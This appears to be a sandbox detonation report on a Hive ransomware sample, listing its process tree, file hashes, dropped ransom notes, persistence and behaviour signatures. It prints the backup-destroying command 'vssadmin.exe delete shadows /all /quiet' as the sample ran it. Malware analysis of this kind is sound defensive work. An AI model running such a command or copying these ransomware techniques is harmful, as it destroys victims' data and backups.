PID 2568 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

C:\Windows\system32\cmd.exe

cmd /c hive.bat >NUL 2>NUL

C:\Windows\system32\cmd.exe

cmd /c shadow.bat >NUL 2>NUL

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

(this process entry, timeout.exe launched as "timeout 1", repeats verbatim 203 times in a row in this part of the process list; the repeats are collapsed here)

Network

N/A

Files

memory/3020-0-0x0000000000B10000-0x0000000000DE9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5 6358d970c3edccb57eae7dbf9f42d58f
SHA1 25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5 df5552357692e0cba5e69f8fbf06abb6
SHA1 4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256 d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512 a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

memory/3020-73-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-85-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-558-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-1721-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-2906-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-3560-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4326-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4335-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4336-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4337-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4338-0x0000000000B10000-0x0000000000DE9000-memory.dmp

C:\$Recycle.Bin\HOW_TO_DECRYPT.txt

MD5 ee4ad142674725d6d9b58c9c3bb836dc
SHA1 ac9bac37131c72a549d2bf3fbd233061906d5fab
SHA256 fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776
SHA512 a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3

memory/3020-5668-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-8139-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-10988-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11884-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11885-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11887-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11890-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11891-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11894-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11895-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11897-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11899-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11901-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11903-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11905-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11907-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11909-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11912-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11914-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11916-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11918-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11920-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11923-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11925-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11927-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11929-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11931-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11933-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11935-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11937-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11939-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11942-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11944-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11946-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11948-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11951-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11953-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11975-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11978-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11980-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11982-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-12008-0x0000000000B10000-0x0000000000DE9000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:12

Platform

win10v2004-20240508-en

Max time kernel

1779s

Max time network

1792s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware


Hive

ransomware hive

Deletes shadow copies

ransomware defense_evasion impact execution

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\DriverData\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\etc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Boot or Logon Autostart Execution: Print Processors

persistence
Description Indicator Process Target
File created C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.P7EsMTWem2f4DapaPblE9Nbz88yP_gFc7vvnpVOSdzs.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
